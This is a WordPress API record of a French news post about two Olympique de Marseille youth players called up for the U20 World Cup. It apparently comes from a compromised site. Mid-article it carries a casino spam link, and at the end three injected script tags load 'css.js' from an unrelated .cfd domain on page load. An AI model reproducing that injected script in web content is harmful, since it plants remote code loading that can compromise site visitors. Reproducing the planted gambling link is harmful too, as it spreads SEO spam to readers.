{"id":3987,"date":"2025-11-20T03:54:48","date_gmt":"2025-11-20T03:54:48","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3987"},"modified":"2026-02-02T22:10:42","modified_gmt":"2026-02-02T22:10:42","slug":"om-deux-jeunes-talents-au-mondial-u20-avec-lequipe-de-france","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-deux-jeunes-talents-au-mondial-u20-avec-lequipe-de-france\/","title":{"rendered":"OM &#8211; deux jeunes talents au Mondial U20 avec l\u2019\u00e9quipe de France !"},"content":{"rendered":"<h1>OM &#8211; deux jeunes talents au Mondial U20 avec l\u2019\u00e9quipe de France !<\/h1>\n<p>La Coupe du monde U20, qui se d\u00e9roulera du 27 septembre au 19 octobre au Chili, aura une saveur particuli\u00e8re pour l\u2019Olympique de Marseille. Deux de ses jeunes joueurs, <strong>Darryl Bakola<\/strong> et<strong> Tadjidine Mmadi<\/strong>, ont \u00e9t\u00e9 retenus par Bernard Diom\u00e8de pour repr\u00e9senter l\u2019\u00e9quipe de France dans cette comp\u00e9tition. Une reconnaissance pour la formation marseillaise, qui voit une nouvelle fois ses p\u00e9pites s\u2019illustrer au plus haut niveau chez les jeunes.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-leon-fr.com\/contato\/\" target=\"_blank\" rel=\"dofollow\">Support client de Casino Vert \u2764\ufe0f : un service disponible 24h\/24<\/a><\/strong> &#8211; casino leon Service client : Une Assistance 24h\/24, Professionnelle et D\u00e9di\u00e9e \u00e0 Votre Satisfaction Le casino leon Service client est-il vraiment \u00e0 la hauteur<\/p><\/blockquote>\n<p>Bakola, milieu polyvalent d\u00e9j\u00e0 remarqu\u00e9 en s\u00e9lections de jeunes, et Mmadi, milieu offensif, auront l\u2019occasion de franchir une \u00e9tape dans leur progression en affrontant des adversaires de haut niveau. Les Bleuets d\u00e9buteront leur tournoi contre l\u2019Afrique du Sud le 29 septembre, avant de d\u00e9fier les \u00c9tats-Unis le 2 octobre, puis de conclure la phase de groupes face \u00e0 la Nouvelle-Cal\u00e9donie le 5 octobre.<\/p>\n<h2>Robinio Vaz retenu par l&#x27;OM\u00a0<\/h2>\n<p>Si l\u2019OM se r\u00e9jouit de voir deux de ses joueurs retenus, le club a cependant fait le choix de conserver <strong>Robinio Vaz<\/strong>, autre grand espoir du centre de formation. Auteur d\u2019un but en Ligue 1 cette saison contre le Paris FC, l\u2019attaquant de 18 ans restera \u00e0 la disposition de Roberto De Zerbi. Ce choix, permis par l\u2019absence de la comp\u00e9tition au calendrier FIFA obligatoire, illustre la volont\u00e9 de l\u2019OM de g\u00e9rer avec pr\u00e9caution le d\u00e9veloppement de son joyau offensif.<\/p>\n<p>En revanche, pour Bakola et Mmadi, l\u2019aventure sera belle. Ils auront l\u2019opportunit\u00e9 de repr\u00e9senter la France dans une comp\u00e9tition o\u00f9 les Bleuets r\u00eavent d\u2019imiter leurs a\u00een\u00e9s sacr\u00e9s en 2013.\u00a0<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM &#8211; deux jeunes talents au Mondial U20 avec l\u2019\u00e9quipe de France ! La Coupe du monde U20, qui se d\u00e9roulera du 27 septembre au 19 octobre au Chili, aura&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3987","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3987","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3987"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3987\/revisions"}],"predecessor-version":[{"id":14872,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3987\/revisions\/14872"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3987"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3987"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3987"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}